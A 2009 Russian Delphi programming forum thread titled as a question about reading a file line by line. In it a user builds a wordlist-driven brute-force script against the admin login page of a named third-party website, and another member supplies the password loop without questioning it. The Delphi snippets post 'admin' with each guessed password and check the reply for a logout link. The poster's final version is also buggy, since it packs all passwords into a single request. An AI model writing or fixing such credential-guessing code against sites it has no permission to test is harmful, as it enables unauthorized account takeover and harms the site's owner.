Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Компоненты Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 26.08.2009, 10:32   #1
aciiiD
Пользователь
 
Регистрация: 05.08.2009
Сообщений: 10
По умолчанию Чтение файла построчно

params.Add('login_username=admin');
params.Add('login_password=xxx');
responseres.Text:=http1.Post('http://ru****p.hut.ru/admin.php',params);
if Pos('logout', responseres.text)>0 then
ShowMessage('YEES!')
Else
ShowMessage('NOO!');

Так вот, что мне с этми надо сделать, что бы в поле login_password=, подбирался пароль из каждой строки файла по очереди??
aciiiD вне форума Ответить с цитированием
Старый 26.08.2009, 10:52   #2
Consol
Пользователь
 
Регистрация: 19.08.2009
Сообщений: 89
По умолчанию

что за файл и как он записан???
Consol вне форума Ответить с цитированием
Старый 26.08.2009, 11:28   #3
aciiiD
Пользователь
 
Регистрация: 05.08.2009
Сообщений: 10
По умолчанию

файл с паролями, вида:
Код:
ana
secret
alfa
etc...
myppass
и как сделать что бы каждый из них подбирался поочереди
aciiiD вне форума Ответить с цитированием
Старый 26.08.2009, 11:29   #4
aciiiD
Пользователь
 
Регистрация: 05.08.2009
Сообщений: 10
По умолчанию

Еще попутный вопрос, как делать по сайту клики по нажным тебе кнопкам? о_0 буду оочень благодарен, но первый вопрос тоже актуален
aciiiD вне форума Ответить с цитированием
Старый 26.08.2009, 13:44   #5
Wicort
Форумчанин
 
Аватар для Wicort
 
Регистрация: 04.08.2009
Сообщений: 684
По умолчанию

Создаешь переменную
var PassList: tStringList;
PassList:= tStringList.Create;
делаешь ей LoadFromFile из твоего файла с паролями
затем в цикле
for i:= 0 to PassList.Count-1 do
begin
params.Add('login_password='+PassLi st.Strings[i]);
//делаешь, что нужно
...
end;

ну или что-то типа того
Еслия Вам помог, не поленитесь нажать на весы и оставить отзыв. Это не займет много времени, но даст понять, что я старался не зря =)
Мой ник зарегистрирован, а твой?
Wicort вне форума Ответить с цитированием
Старый 26.08.2009, 14:37   #6
aciiiD
Пользователь
 
Регистрация: 05.08.2009
Сообщений: 10
По умолчанию

Wicort ну ты ман мне помог, огромное спасибо )) с меня пиво
aciiiD вне форума Ответить с цитированием
Старый 26.08.2009, 15:19   #7
aciiiD
Пользователь
 
Регистрация: 05.08.2009
Сообщений: 10
По умолчанию

Последний вопрос, как сделать что бы ту был пароль???
Memo1.Lines.Add('login: admin password: '+PassList.показать текущию пароль);
aciiiD вне форума Ответить с цитированием
Старый 26.08.2009, 15:22   #8
BOBAH13
Android Developer
Старожил Подтвердите свой е-майл
 
Аватар для BOBAH13
 
Регистрация: 19.02.2007
Сообщений: 3,708
По умолчанию

Цитата:
Сообщение от aciiiD Посмотреть сообщение
Последний вопрос, как сделать что бы ту был пароль???
Memo1.Lines.Add('login: admin password: '+PassList.показать текущию пароль);
как я понял, Copy + Pos (ищем по форуму и в сети, уже многократно обсуждалось).
BOBAH13 вне форума Ответить с цитированием
Старый 26.08.2009, 15:29   #9
aciiiD
Пользователь
 
Регистрация: 05.08.2009
Сообщений: 10
По умолчанию

ну все таки, если не трудно, так влом искать, пожалуйста
aciiiD вне форума Ответить с цитированием
Старый 26.08.2009, 15:41   #10
aciiiD
Пользователь
 
Регистрация: 05.08.2009
Сообщений: 10
По умолчанию

Код:
procedure TForm5.btn1Click(Sender: TObject);
var
params,responseres:tstringlist;
i:Integer;
PassList:tstringlist;
begin
PassList:=tstringlist.Create;
PassList.LoadFromFile('C:\pass.txt');
params:=TStringList.Create;
responseres:=TStringList.Create;
params.Add('login_username=admin');
for i:= 0 to PassList.Count-1 do params.Add('login_password='+PassList.Strings[i]);
responseres.Text:=http1.Post('http://rus-rap.hut.ru/admin.php',params);
if Pos('logout', responseres.Text)>0 then
  Memo1.Lines.Add('login: admin   password: '+PassList.Strings[ну как тут выбрать c,сбрученный пароль]);

end;
aciiiD вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Чтение из файла. Си. MAKEDON Помощь студентам 1 17.08.2009 16:42
Чтение из файла Amen БД в Delphi 2 09.12.2008 10:40
Определения частоты пары соседних символов в каждой строке и формирования файла частот построчно ивт Паскаль, Turbo Pascal, PascalABC.NET 11 07.12.2008 20:52
Определения частоты пары соседних символов в каждой строке и формирования файла частот построчно ивт Паскаль, Turbo Pascal, PascalABC.NET 0 05.12.2008 20:09
Как из юникодного текстового файла прочитать его построчно и неповторяющиеся слова ввести в ListBox? SkAndrew Общие вопросы Delphi 2 10.11.2008 22:14